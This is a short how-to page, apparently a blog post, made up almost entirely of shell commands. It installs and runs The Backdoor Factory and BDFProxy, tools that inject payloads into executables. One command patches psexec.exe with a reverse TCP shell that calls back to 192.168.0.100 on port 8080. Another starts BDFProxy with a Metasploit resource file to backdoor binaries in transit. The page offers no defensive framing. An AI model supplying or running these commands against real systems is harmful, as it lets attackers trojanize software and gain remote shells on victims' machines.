Install
sudo apt-get install git python-pip build-essentialInstall BDFactory :
cd ~
mkdir arsenal
cd arsenal
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
sudo pip install capstone
sudo ./install.shHow to run it :
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcpInstall BDFProxy :
cd ~/arsenal
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
sudo ./install.shHow to run it :
nano bdfproxy.cfg*change the settings when necessary
./bdf_proxy.py
msfconsole -r bdfproxy_msf_resource.rcUpdate/Upgrade
sudo apt-get update
sudo apt-get dist-upgrade
cd ~/arsenal/the-backdoor-factory
sudo ./update.sh
cd ~/arsenal/BDFProxy
sudo ./update.shReference
See also : Metaspolit Framework
That's all! See you.